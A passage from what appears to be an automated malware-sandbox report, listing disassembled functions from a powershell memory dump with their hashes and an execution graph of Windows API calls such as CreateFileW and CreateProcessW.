                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60424422F0EBC90FE7A6976818652B9BBE1EF92211B0901FBD28DC75D3DD48AC05C341
                                                                                                                                                                                                                    Function 00007FFD32CD49DD Relevance: 5.5, Strings: 4, Instructions: 480COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000008.00000002.2397768619.00007FFD32CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CD0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd32cd0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: @2$@2$@2$H2
                                                                                                                                                                                                                    • API String ID: 0-3331150452
                                                                                                                                                                                                                    • Opcode ID: cf234b5bf24b00189eaa73b8650097cd55a22c9c3f020cf45e79ea0087693211
                                                                                                                                                                                                                    • Instruction ID: 564f9a059dd267c3f76cd1785833081fa22f683a3ba0e1e2c5901d20b6043e89
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf234b5bf24b00189eaa73b8650097cd55a22c9c3f020cf45e79ea0087693211
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E14732F0EF494FEBA5DB1884656B8B7D1EF95312B1801BEE24DC7592DA65EC01C340
                                                                                                                                                                                                                    Function 00007FFD32CD4B46 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000008.00000002.2397768619.00007FFD32CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CD0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd32cd0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: @2$@2
                                                                                                                                                                                                                    • API String ID: 0-2352847036
                                                                                                                                                                                                                    • Opcode ID: 3194cbb02fe56727de12f499cd947732272ecbe3ad6ec0b2dc77e5e75cb2907a
                                                                                                                                                                                                                    • Instruction ID: e97f8d3c13ebe6d2c6da17145aa3972fc66ada5d54bf117bad9692b0659b9dda
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3194cbb02fe56727de12f499cd947732272ecbe3ad6ec0b2dc77e5e75cb2907a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94511836F0EE4A5FEBB4DB0D94A56B8B7D1EFA8312B0401BED24DC7592CE65AC019340
                                                                                                                                                                                                                    Function 00007FFD32CD3451 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000008.00000002.2397768619.00007FFD32CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CD0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd32cd0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: T2
                                                                                                                                                                                                                    • API String ID: 0-2724177064
                                                                                                                                                                                                                    • Opcode ID: fd19a0bcbdc2be58b4d509990ca1f3f08454d7a6df8016780cc7952c1bafc85c
                                                                                                                                                                                                                    • Instruction ID: 4b6fd9cfa325cb7b0c484318574ade58afc38a3b4820afa3684f48972bea20bc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd19a0bcbdc2be58b4d509990ca1f3f08454d7a6df8016780cc7952c1bafc85c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD512352F0FBC60FE396962918B52B87BE1EF96211B0901FBD049CB1E3EC4AAC05D751
                                                                                                                                                                                                                    Function 00007FFD32CD451A Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000008.00000002.2397768619.00007FFD32CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CD0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd32cd0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: b5ac399361d0aa30b755038c2ce86edce519ade906efa63f66c765fd030d0f1e
                                                                                                                                                                                                                    • Instruction ID: eda6ff389d6b0ddae3df82fc1c39e2466bcbb8305e5133f1ba6ace746a5af60a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5ac399361d0aa30b755038c2ce86edce519ade906efa63f66c765fd030d0f1e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41411B23F0FA870BF7B5976904B52FCE6C1AF95252B5800BAD74EC79D3ED58AC056201
                                                                                                                                                                                                                    Function 00007FFD32C03A05 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000008.00000002.2396450503.00007FFD32C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32C00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd32c00000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                    • Instruction ID: d746ebb82a88c11202b0d25506570acfab8927349930d76e4b76840819ba1c4d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0201A73024CB0C4FDB44EF0CE051AA9B3E0FB89360F10052DE58AC3651D632E881CB41
                                                                                                                                                                                                                    Function 00007FFD32CD04D8 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000008.00000002.2397768619.00007FFD32CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CD0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd32cd0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 9d1fe6326ab3719bd315992853711da8d8aed6a9ef71c6f66cbf2d1d0854e18a
                                                                                                                                                                                                                    • Instruction ID: f6f0f430770158b94699839f2c34d5a1fc4636d95dc42324144077af1ea1b278
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d1fe6326ab3719bd315992853711da8d8aed6a9ef71c6f66cbf2d1d0854e18a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2E09A23F0F9290EEBA1E69C28281F86681EB5432270802B6EA1DC3581EC40AC105685

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:2.4%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                    Signature Coverage:5.7%
                                                                                                                                                                                                                    Total number of Nodes:1423
                                                                                                                                                                                                                    Total number of Limit Nodes:40
                                                                                                                                                                                                                    execution_graph 94494 7ff656cc47e1 94495 7ff656cc4d57 94494->94495 94499 7ff656cc47f2 94494->94499 94559 7ff656cbee20 5 API calls Concurrency::wait 94495->94559 94497 7ff656cc4d66 94560 7ff656cbee20 5 API calls Concurrency::wait 94497->94560 94499->94497 94500 7ff656cc4862 94499->94500 94501 7ff656cc4df3 94499->94501 94505 7ff656cc3c80 94500->94505 94524 7ff656cc66c0 94500->94524 94561 7ff656d30978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94501->94561 94504 7ff656cc3dde 94505->94504 94506 7ff656d105be 94505->94506 94508 7ff656cc4a8f 94505->94508 94512 7ff656cc4fe7 94505->94512 94519 7ff656cc4aa9 94505->94519 94520 7ff656cd5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94505->94520 94521 7ff656cb9640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94505->94521 94522 7ff656cd4f0c 34 API calls __scrt_initialize_thread_safe_statics 94505->94522 94523 7ff656cd50b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94505->94523 94558 7ff656cc5360 300 API calls Concurrency::wait 94505->94558 94562 7ff656cbe0a8 94505->94562 94566 7ff656d334e4 77 API calls 3 library calls 94505->94566 94567 7ff656d334e4 77 API calls 3 library calls 94506->94567 94511 7ff656cc4ac0 94508->94511 94515 7ff656d0fefe 94508->94515 94508->94519 94510 7ff656d105d1 94514 7ff656cbe0a8 4 API calls 94512->94514 94513 7ff656cbe0a8 4 API calls 94513->94504 94514->94504 94517 7ff656cbe0a8 4 API calls 94515->94517 94517->94511 94519->94511 94519->94513 94520->94505 94521->94505 94522->94505 94523->94505 94549 7ff656cc673b memcpy_s Concurrency::wait 94524->94549 94526 7ff656d11fac 94527 7ff656d11fbe 94526->94527 94724 7ff656d4ab30 300 API calls Concurrency::wait 94526->94724 94527->94505 94529 7ff656cc6d40 9 API calls 94529->94549 94531 7ff656cc6c0f 94532 7ff656d11fc9 94531->94532 94533 7ff656cc6c3d 94531->94533 94725 7ff656d334e4 77 API calls 3 library calls 94532->94725 94721 7ff656cbee20 5 API calls Concurrency::wait 94533->94721 94536 7ff656cc6c4a 94722 7ff656cd1fcc 300 API calls 94536->94722 94541 7ff656d120c1 94550 7ff656cc6b15 94541->94550 94728 7ff656d334e4 77 API calls 3 library calls 94541->94728 94542 7ff656cc6c78 94723 7ff656cce8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94542->94723 94546 7ff656d12032 94726 7ff656d334e4 77 API calls 3 library calls 94546->94726 94547 7ff656cbe0a8 4 API calls 94547->94549 94549->94526 94549->94529 94549->94531 94549->94532 94549->94536 94549->94541 94549->94542 94549->94546 94549->94547 94549->94550 94568 7ff656d37e48 94549->94568 94602 7ff656d38e98 94549->94602 94635 7ff656d35b80 94549->94635 94641 7ff656d363dc 94549->94641 94646 7ff656d4f160 94549->94646 94651 7ff656d38ea0 94549->94651 94684 7ff656d4f0ac 94549->94684 94687 7ff656cd4c68 94549->94687 94693 7ff656cc3c20 94549->94693 94714 7ff656cd5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94549->94714 94715 7ff656cbec00 94549->94715 94720 7ff656cd50b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94549->94720 94727 7ff656d48d98 49 API calls Concurrency::wait 94549->94727 94550->94505 94558->94505 94559->94497 94560->94501 94561->94505 94563 7ff656cbe0b6 94562->94563 94564 7ff656cbe0bb 94562->94564 94964 7ff656cbf0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94563->94964 94564->94505 94566->94505 94567->94510 94569 7ff656d37e79 94568->94569 94600 7ff656d37f55 Concurrency::wait 94569->94600 94773 7ff656cb9640 94569->94773 94571 7ff656d37ea6 94573 7ff656cb9640 4 API calls 94571->94573 94575 7ff656d37eaf 94573->94575 94577 7ff656cbd4cc 48 API calls 94575->94577 94579 7ff656d37ebe 94577->94579 94776 7ff656cb74ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94579->94776 94583 7ff656d37ed8 94777 7ff656cb7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94583->94777 94584 7ff656d37fbe GetLastError 94585 7ff656d37fd8 94584->94585 94595 7ff656d37fe5 94585->94595 94780 7ff656cb7ab8 94585->94780 94587 7ff656d37f07 94587->94600 94778 7ff656d2bdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 94587->94778 94588 7ff656d37ff5 94591 7ff656cb9640 4 API calls 94588->94591 94593 7ff656d38035 94591->94593 94592 7ff656d37f17 94594 7ff656d37f1b 94592->94594 94592->94600 94593->94595 94783 7ff656d20d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94593->94783 94597 7ff656cbec00 4 API calls 94594->94597 94595->94549 94598 7ff656d37f28 94597->94598 94779 7ff656d2bab8 8 API calls Concurrency::wait 94598->94779 94600->94595 94729 7ff656cb834c 94600->94729 94601 7ff656d37f31 Concurrency::wait 94601->94600 94603 7ff656d3a680 94602->94603 94604 7ff656cb834c 5 API calls 94603->94604 94611 7ff656d3a71a 94603->94611 94605 7ff656d3a6be 94604->94605 94606 7ff656cbd4cc 48 API calls 94605->94606 94610 7ff656d3a6d0 94606->94610 94607 7ff656d3a7fd 94838 7ff656d31864 6 API calls 94607->94838 94608 7ff656d3a6f3 94608->94549 94613 7ff656cb6838 16 API calls 94610->94613 94611->94607 94611->94608 94615 7ff656d3a770 94611->94615 94612 7ff656d3a805 94618 7ff656d2b334 4 API calls 94612->94618 94614 7ff656d3a6e2 94613->94614 94614->94611 94616 7ff656d3a6e6 94614->94616 94617 7ff656cbd4cc 48 API calls 94615->94617 94616->94608 94620 7ff656cb7ab8 CloseHandle 94616->94620 94623 7ff656d3a778 94617->94623 94634 7ff656d3a7e0 Concurrency::wait 94618->94634 94619 7ff656d3a7ee 94807 7ff656d2b3a8 94619->94807 94620->94608 94621 7ff656d3a7a7 94825 7ff656cb98e8 94621->94825 94623->94619 94623->94621 94625 7ff656cb8314 CloseHandle 94627 7ff656d3a85c 94625->94627 94626 7ff656d3a7b5 94628 7ff656cbe0a8 4 API calls 94626->94628 94627->94608 94630 7ff656cb7ab8 CloseHandle 94627->94630 94629 7ff656d3a7c2 94628->94629 94828 7ff656cb71f8 94629->94828 94630->94608 94632 7ff656d3a7d3 94633 7ff656d2b3a8 12 API calls 94632->94633 94633->94634 94634->94608 94634->94625 94636 7ff656d35ba5 94635->94636 94637 7ff656d35ba9 94636->94637 94638 7ff656d35be5 FindClose 94636->94638 94639 7ff656d35bd5 94636->94639 94637->94549 94638->94637 94639->94637 94640 7ff656cb7ab8 CloseHandle 94639->94640 94640->94637 94642 7ff656cbd4cc 48 API calls 94641->94642 94643 7ff656d363f8 94642->94643 94852 7ff656d2bdec 94643->94852 94645 7ff656d36404 94645->94549 94860 7ff656d4f630 94646->94860 94648 7ff656d4f1cd 94648->94549 94649 7ff656d4f182 94649->94648 94928 7ff656cbee20 5 API calls Concurrency::wait 94649->94928 94652 7ff656d3a680 94651->94652 94653 7ff656cb834c 5 API calls 94652->94653 94659 7ff656d3a71a 94652->94659 94654 7ff656d3a6be 94653->94654 94655 7ff656cbd4cc 48 API calls 94654->94655 94658 7ff656d3a6d0 94655->94658 94656 7ff656d3a7fd 94957 7ff656d31864 6 API calls 94656->94957 94661 7ff656cb6838 16 API calls 94658->94661 94659->94656 94663 7ff656d3a770 94659->94663 94680 7ff656d3a6f3 94659->94680 94660 7ff656d3a805 94666 7ff656d2b334 4 API calls 94660->94666 94662 7ff656d3a6e2 94661->94662 94662->94659 94664 7ff656d3a6e6 94662->94664 94665 7ff656cbd4cc 48 API calls 94663->94665 94668 7ff656cb7ab8 CloseHandle 94664->94668 94664->94680 94672 7ff656d3a778 94665->94672 94683 7ff656d3a7e0 Concurrency::wait 94666->94683 94667 7ff656d3a7ee 94670 7ff656d2b3a8 12 API calls 94667->94670 94668->94680 94669 7ff656d3a7a7 94671 7ff656cb98e8 4 API calls 94669->94671 94670->94683 94674 7ff656d3a7b5 94671->94674 94672->94667 94672->94669 94673 7ff656cb8314 CloseHandle 94675 7ff656d3a85c 94673->94675 94676 7ff656cbe0a8 4 API calls 94674->94676 94678 7ff656cb7ab8 CloseHandle 94675->94678 94675->94680 94677 7ff656d3a7c2 94676->94677 94679 7ff656cb71f8 4 API calls 94677->94679 94678->94680 94681 7ff656d3a7d3 94679->94681 94680->94549 94682 7ff656d2b3a8 12 API calls 94681->94682 94682->94683 94683->94673 94683->94680 94685 7ff656d4f630 164 API calls 94684->94685 94686 7ff656d4f0c2 94685->94686 94686->94549 94692 7ff656cd4c2c 94687->94692 94688 7ff656cd4c50 94688->94549 94692->94687 94692->94688 94958 7ff656cd925c EnterCriticalSection LeaveCriticalSection fread_s 94692->94958 94959 7ff656cd5600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 94692->94959 94960 7ff656cd5620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 94692->94960 94706 7ff656cc3c80 94693->94706 94694 7ff656d105be 94963 7ff656d334e4 77 API calls 3 library calls 94694->94963 94696 7ff656cc4a8f 94699 7ff656cc4aa9 94696->94699 94700 7ff656cc4ac0 94696->94700 94705 7ff656d0fefe 94696->94705 94698 7ff656d105d1 94698->94549 94699->94700 94703 7ff656cbe0a8 4 API calls 94699->94703 94700->94549 94701 7ff656cc4fe7 94704 7ff656cbe0a8 4 API calls 94701->94704 94702 7ff656cc3dde 94702->94549 94703->94702 94704->94702 94708 7ff656cbe0a8 4 API calls 94705->94708 94706->94694 94706->94696 94706->94699 94706->94701 94706->94702 94707 7ff656cbe0a8 4 API calls 94706->94707 94710 7ff656cd5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94706->94710 94711 7ff656cb9640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94706->94711 94712 7ff656cd4f0c 34 API calls __scrt_initialize_thread_safe_statics 94706->94712 94713 7ff656cd50b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94706->94713 94961 7ff656cc5360 300 API calls Concurrency::wait 94706->94961 94962 7ff656d334e4 77 API calls 3 library calls 94706->94962 94707->94706 94708->94700 94710->94706 94711->94706 94712->94706 94713->94706 94716 7ff656cbec1d 94715->94716 94717 7ff656d0a5a2 94716->94717 94718 7ff656cd4c68 4 API calls 94716->94718 94719 7ff656cbec55 memcpy_s 94718->94719 94719->94549 94721->94536 94722->94542 94723->94542 94724->94527 94725->94550 94726->94550 94727->94549 94728->94550 94730 7ff656cd4c68 4 API calls 94729->94730 94731 7ff656cb8363 94730->94731 94784 7ff656cb8314 94731->94784 94734 7ff656cb9640 4 API calls 94735 7ff656cb8378 94734->94735 94736 7ff656cb8314 CloseHandle 94735->94736 94737 7ff656cb8380 94736->94737 94738 7ff656cbd4cc 94737->94738 94739 7ff656cbd4f2 94738->94739 94740 7ff656cbd50b 94738->94740 94757 7ff656cb6838 94739->94757 94741 7ff656cbd53e 94740->94741 94742 7ff656cbd513 94740->94742 94743 7ff656d09cc4 94741->94743 94745 7ff656cbd550 94741->94745 94752 7ff656d09bbc 94741->94752 94787 7ff656cd956c 31 API calls 94742->94787 94790 7ff656cd9538 31 API calls 94743->94790 94788 7ff656cd4834 46 API calls 94745->94788 94747 7ff656cbd522 94751 7ff656cbec00 4 API calls 94747->94751 94749 7ff656d09cdc 94751->94739 94753 7ff656cd4c68 4 API calls 94752->94753 94756 7ff656d09c3e Concurrency::wait wcscpy 94752->94756 94754 7ff656d09c0a 94753->94754 94755 7ff656cbec00 4 API calls 94754->94755 94755->94756 94789 7ff656cd4834 46 API calls 94756->94789 94758 7ff656cb8314 CloseHandle 94757->94758 94759 7ff656cb685a 94758->94759 94760 7ff656cfcaa8 94759->94760 94761 7ff656cb687d CreateFileW 94759->94761 94763 7ff656cfcaae CreateFileW 94760->94763 94770 7ff656cb68d9 94760->94770 94762 7ff656cb68ab 94761->94762 94769 7ff656cb68e4 94762->94769 94791 7ff656cb68f4 9 API calls 94762->94791 94763->94762 94764 7ff656cfcae6 94763->94764 94793 7ff656cb6a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94764->94793 94766 7ff656cfcaf3 94766->94762 94768 7ff656cb68c1 94768->94770 94792 7ff656cb6a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94768->94792 94769->94584 94769->94588 94770->94769 94794 7ff656d2b334 94770->94794 94774 7ff656cd4c68 4 API calls 94773->94774 94775 7ff656cb9663 94774->94775 94775->94571 94776->94583 94777->94587 94778->94592 94779->94601 94802 7ff656cb82e4 94780->94802 94783->94595 94785 7ff656cb833d CloseHandle 94784->94785 94786 7ff656cb832a 94784->94786 94785->94786 94786->94734 94787->94747 94788->94747 94789->94743 94790->94749 94791->94768 94792->94770 94793->94766 94797 7ff656d2b188 94794->94797 94798 7ff656d2b19c WriteFile 94797->94798 94799 7ff656d2b193 94797->94799 94798->94769 94801 7ff656d2b208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94799->94801 94801->94798 94803 7ff656cb8314 CloseHandle 94802->94803 94804 7ff656cb82f2 Concurrency::wait 94803->94804 94805 7ff656cb8314 CloseHandle 94804->94805 94806 7ff656cb8303 94805->94806 94808 7ff656d2b3c8 94807->94808 94809 7ff656d2b42a 94807->94809 94810 7ff656d2b3d0 94808->94810 94811 7ff656d2b41e 94808->94811 94812 7ff656d2b334 4 API calls 94809->94812 94814 7ff656d2b3dd 94810->94814 94815 7ff656d2b3f1 94810->94815 94846 7ff656d2b458 8 API calls 94811->94846 94824 7ff656d2b410 Concurrency::wait 94812->94824 94842 7ff656cba368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94814->94842 94844 7ff656cba368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94815->94844 94818 7ff656d2b3e2 94843 7ff656cd4120 6 API calls 94818->94843 94819 7ff656d2b3f6 94845 7ff656d2b270 6 API calls 94819->94845 94822 7ff656d2b3ef 94839 7ff656d2b384 94822->94839 94824->94634 94826 7ff656cd4c68 4 API calls 94825->94826 94827 7ff656cb9918 94826->94827 94827->94626 94829 7ff656cb721c 94828->94829 94833 7ff656cfcd0c 94828->94833 94830 7ff656cb7274 94829->94830 94835 7ff656cfcd66 memcpy_s 94829->94835 94847 7ff656cbb960 94830->94847 94832 7ff656cb7283 memcpy_s 94832->94632 94834 7ff656cd4c68 4 API calls 94833->94834 94834->94835 94836 7ff656cd4c68 4 API calls 94835->94836 94837 7ff656cfcdda memcpy_s 94836->94837 94838->94612 94840 7ff656d2b334 4 API calls 94839->94840 94841 7ff656d2b399 94840->94841 94841->94824 94842->94818 94843->94822 94844->94819 94845->94822 94846->94824 94848 7ff656cbb981 94847->94848 94851 7ff656cbb976 memcpy_s 94847->94851 94849 7ff656cd4c68 4 API calls 94848->94849 94850 7ff656cfef2a 94848->94850 94849->94851 94851->94832 94855 7ff656d2c7c0 lstrlenW 94852->94855 94856 7ff656d2c7dd GetFileAttributesW 94855->94856 94857 7ff656d2bdf5 94855->94857 94856->94857 94858 7ff656d2c7eb FindFirstFileW 94856->94858 94857->94645 94858->94857 94859 7ff656d2c7ff FindClose 94858->94859 94859->94857 94863 7ff656d4f671 fread_s 94860->94863 94861 7ff656cbd4cc 48 API calls 94862 7ff656d4f74d 94861->94862 94929 7ff656cbe330 94862->94929 94863->94861 94865 7ff656d4f759 94866 7ff656d4f762 94865->94866 94867 7ff656d4f840 94865->94867 94869 7ff656cbd4cc 48 API calls 94866->94869 94868 7ff656d4f87d GetCurrentDirectoryW 94867->94868 94872 7ff656cbd4cc 48 API calls 94867->94872 94870 7ff656cd4c68 4 API calls 94868->94870 94871 7ff656d4f777 94869->94871 94873 7ff656d4f8a7 GetCurrentDirectoryW 94870->94873 94874 7ff656cbe330 4 API calls 94871->94874 94875 7ff656d4f85c 94872->94875 94876 7ff656d4f8b5 94873->94876 94877 7ff656d4f783 94874->94877 94878 7ff656cbe330 4 API calls 94875->94878 94879 7ff656d4f8f0 94876->94879 94942 7ff656ccf688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94876->94942 94880 7ff656cbd4cc 48 API calls 94877->94880 94881 7ff656d4f868 94878->94881 94888 7ff656d4f905 94879->94888 94889 7ff656d4f901 94879->94889 94883 7ff656d4f798 94880->94883 94881->94868 94881->94879 94885 7ff656cbe330 4 API calls 94883->94885 94884 7ff656d4f8d0 94943 7ff656ccf688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94884->94943 94887 7ff656d4f7a4 94885->94887 94891 7ff656cbd4cc 48 API calls 94887->94891 94945 7ff656d2fddc 8 API calls 94888->94945 94893 7ff656d4f972 94889->94893 94894 7ff656d4fa0f CreateProcessW 94889->94894 94890 7ff656d4f8e0 94944 7ff656ccf688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94890->94944 94896 7ff656d4f7b9 94891->94896 94948 7ff656d1d1f8 99 API calls 94893->94948 94907 7ff656d4f9b4 94894->94907 94900 7ff656cbe330 4 API calls 94896->94900 94897 7ff656d4f90e 94946 7ff656d2fca8 8 API calls 94897->94946 94904 7ff656d4f7c5 94900->94904 94901 7ff656d4f926 94947 7ff656d2fafc 8 API calls ~SyncLockT 94901->94947 94903 7ff656d4f806 GetSystemDirectoryW 94906 7ff656cd4c68 4 API calls 94903->94906 94904->94903 94908 7ff656cbd4cc 48 API calls 94904->94908 94905 7ff656d4f94f 94905->94889 94909 7ff656d4f830 GetSystemDirectoryW 94906->94909 94911 7ff656d4fabe CloseHandle 94907->94911 94919 7ff656d4fa64 94907->94919 94910 7ff656d4f7e1 94908->94910 94909->94876 94912 7ff656cbe330 4 API calls 94910->94912 94913 7ff656d4facc 94911->94913 94914 7ff656d4faf5 94911->94914 94915 7ff656d4f7ed 94912->94915 94949 7ff656d2f7dc 94913->94949 94917 7ff656d4fafe 94914->94917 94922 7ff656d4fb26 CloseHandle 94914->94922 94915->94876 94915->94903 94924 7ff656d4faa3 94917->94924 94923 7ff656d4fa84 GetLastError 94919->94923 94922->94924 94923->94924 94933 7ff656d2f51c 94924->94933 94928->94648 94930 7ff656cbe342 94929->94930 94931 7ff656cd4c68 4 API calls 94930->94931 94932 7ff656cbe361 wcscpy 94931->94932 94932->94865 94934 7ff656d2f7dc CloseHandle 94933->94934 94935 7ff656d2f52a 94934->94935 94954 7ff656d2f7b8 94935->94954 94938 7ff656d2f7b8 ~SyncLockT CloseHandle 94939 7ff656d2f53c 94938->94939 94940 7ff656d2f7b8 ~SyncLockT CloseHandle 94939->94940 94941 7ff656d2f545 94940->94941 94941->94649 94942->94884 94943->94890 94944->94879 94945->94897 94946->94901 94947->94905 94948->94907 94950 7ff656d2f7b8 ~SyncLockT CloseHandle 94949->94950 94951 7ff656d2f7ee 94950->94951 94952 7ff656d2f7b8 ~SyncLockT CloseHandle 94951->94952 94953 7ff656d2f7f7 94952->94953 94955 7ff656d2f7c9 CloseHandle 94954->94955 94956 7ff656d2f533 94954->94956 94955->94956 94956->94938 94957->94660 94958->94692 94960->94692 94961->94706 94962->94706 94963->94698 94964->94564 94965 7ff656cd90e0 94972 7ff656ceaf30 94965->94972 94967 7ff656cd90e5 94968 7ff656ceba10 _isindst LeaveCriticalSection 94967->94968 94969 7ff656cd90f0 94968->94969 94970 7ff656cd9118 11 API calls 94969->94970 94971 7ff656cd90fc 94969->94971 94970->94971 94977 7ff656ceb778 35 API calls 3 library calls 94972->94977 94974 7ff656ceaf3b 94978 7ff656ceb26c 35 API calls abort 94974->94978 94977->94974 94979 7ff656cec51c 94980 7ff656cec52b fread_s 94979->94980 94981 7ff656cec567 94979->94981 94980->94981 94982 7ff656cec54e HeapAlloc 94980->94982 94986 7ff656cd925c EnterCriticalSection LeaveCriticalSection fread_s 94980->94986 94987 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 94981->94987 94982->94980 94984 7ff656cec565 94982->94984 94986->94980 94987->94984 94988 7ff656cc2bf8 94991 7ff656cbed44 94988->94991 94990 7ff656cc2c05 94992 7ff656cbed75 94991->94992 94993 7ff656cbedcd 94991->94993 94992->94993 94994 7ff656cc3c20 300 API calls 94992->94994 94998 7ff656cbedfe 94993->94998 95001 7ff656d334e4 77 API calls 3 library calls 94993->95001 94996 7ff656cbeda8 94994->94996 94996->94998 95000 7ff656cbee20 5 API calls Concurrency::wait 94996->95000 94997 7ff656d0a636 94998->94990 95000->94993 95001->94997 95002 7ff656cc2c17 95005 7ff656cc14a0 95002->95005 95004 7ff656cc2c2a 95006 7ff656cc14d3 95005->95006 95007 7ff656d0be31 95006->95007 95009 7ff656d0bdd1 95006->95009 95010 7ff656d0bdf2 95006->95010 95036 7ff656cc14fa fread_s 95006->95036 95053 7ff656d48f48 300 API calls 3 library calls 95007->95053 95012 7ff656d0bddb 95009->95012 95009->95036 95013 7ff656d0be19 95010->95013 95051 7ff656d49a88 300 API calls 4 library calls 95010->95051 95050 7ff656d49514 300 API calls 95012->95050 95052 7ff656d334e4 77 API calls 3 library calls 95013->95052 95015 7ff656cc1884 95041 7ff656cd2130 45 API calls 95015->95041 95018 